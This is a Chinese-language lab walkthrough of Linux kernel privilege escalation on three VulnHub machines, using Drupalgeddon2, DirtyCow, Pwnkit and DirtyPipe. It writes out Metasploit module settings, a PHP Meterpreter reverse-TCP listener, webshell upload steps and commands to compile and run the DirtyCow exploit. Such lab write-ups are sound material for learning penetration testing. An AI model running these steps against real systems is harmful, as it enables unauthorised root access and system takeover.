当前位置: 首页 > news >正文

Linux权限提升-内核溢出

一:Web到Linux-内核溢出Dcow

复现环境:https://www.vulnhub.com/entry/lampiao-1,249/

1.信息收集:探测⽬标ip及开发端⼝

2.Web漏洞利⽤:

查找drupal相关漏洞
search drupal
# 进⾏漏洞利⽤
use exploit/unix/webapp/drupal_drupalgeddon2
set rhost 192.168.   .  
set rport 1898
run

 

3.内核提权:

# 上传内核漏洞检测脚本
upload /root/linux-exploit-suggester.sh /tmp/1.sh
# 进⼊shell,并执⾏提权辅助脚本
shell
cd /tmp
chmod +x 1.sh
./1.sh

 

 https://github.com/gbonacini/CVE-2016-5195

4.发现提权漏洞,上传提权利⽤程序dcow.cpp到服务器
 exit
 upload /root/dcow.cpp /tmp/dcow.cpp 

5. 编译漏洞利⽤程序成功后会在当前⽬录⽣成dcow
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow dcow.cpp -lutil
ls
# 由于本身的终端问题,所以使⽤python终端
python -c 'import pty; pty.spawn("/bin/bash")'
./dcow
# 漏洞利⽤成功后使⽤root⽤户密码dirtyCowFun进⾏登录即可
su root
whoami

二:Web到Linux-内核溢出Pwnkit 

复现环境:https://www.vulnhub.com/entry/darkhole-1,724/

1.信息收集:探测⽬标ip及开发端⼝

2.Web漏洞利⽤:

重置管理密码,注册新账号,使⽤注册⽤户登录,并重置密码,

使用Bp抓包进行修改管理员密码进入后台 ,上传一句话木马进入

3. 反弹MSF

将内核检测脚本和综合检测脚本都上传到⽬标服务器的/tmp⽬录

4.启动msf
└─# msfdb run
# 监听本地6666端⼝等待php反弹后⻔连接
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 6666(端口自己设置)
run

 

5.内核提权

通过xftp8上传两个文件linux-exploit-suggester.sh      linpeas.sh

进⼊shell
shell
cd /tmp
chmod +x linpeas.sh
chmod +x linux-exploit-suggester.sh

运行两个文件

 查找漏洞利⽤模块  使⽤提权漏洞利⽤模块   在获取的shell中查看当前⽤户权限

 

Web到Linux-内核溢出-DirtyPipe

复现环境:https://www.vulnhub.com/entry/matrix-breakout-2-morpheus,757/ 

1.信息收集:

 

2.Web漏洞利⽤

 ⽬录扫描  dirb  http://192.168.   . 

访问http://192.168.   .   /graffiti.php进⾏功能测试并抓包

3. 写⼊⼀句话⽊⻢发送恶意代码,并使⽤哥斯拉连接

4. 反弹MSF

5. 内核提权

上传提权内核漏洞检测辅助脚本

进⼊shell进⾏提权漏洞检测
shell
cd /tmp
chmod +x 1.sh
./1.sh

 

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.dtcms.com/a/14494.html

相关文章:

  • springboot241-springboot在线教学平台(源码+论文+PPT+部署讲解等)
  • 物联网平台-分布式的设备接入与管理系统
  • 探索DeepSeek:开源大模型领域的中国力量
  • 通过docker启用rabbitmq插件
  • 【gRPC-gateway】auth-通过拦截器从上下文中提取元数据用于认证,与从http header转发待认证数据到上下文进行验证,go案例
  • DeepSeek和ChatGPT的对比
  • KaiOS 4.0 APN List 界面加载debug
  • Linux 远程文件复制传输-----scp/rsync/sftp
  • Git | 相关命令
  • QT 异步编程之多线程
  • CSDN 大模型 笔记
  • 虚拟化重大灾难:硬盘故障导致的 VMware vSphere 故障排查与解决全过程
  • PHP的JIT编译器
  • Druid GetConnectionTimeoutException解决方案之一
  • 数据结构-栈和队列的应用
  • sql注入之盲注(bool盲注,时间盲注)
  • list_for_each_entry_safe 简介
  • AUTOGPT:基于GPT模型开发的实验性开源应用程序; 目标设定与分解 ;;自主思考与决策 ;;信息交互与执行
  • Windows中使用Docker安装Anythingllm,基于deepseek构建自己的本地知识库问答大模型,可局域网内多用户访问、离线运行
  • 云计算实训室解决方案(2025年最新版)
  • C++ 设计模式-建造者模式
  • 深度学习框架探秘|TensorFlow vs PyTorch:AI 框架的巅峰对决
  • MySQL调用存储过程和存储函数
  • win10中mstsc远程Centos-Stream 9图形化界面
  • 简单几个步骤完成 Oracle 到金仓数据库(KingbaseES)的迁移目标
  • 朝天椒USB服务器:解决加密狗远程连接
  • 软件工程-软件设计
  • Docker 部署 MySQL-5.7 单机版
  • 浏览器网络请求全流程深度解析
  • 网络协议/MQTT Paho.MQTT客户端库接口基础知识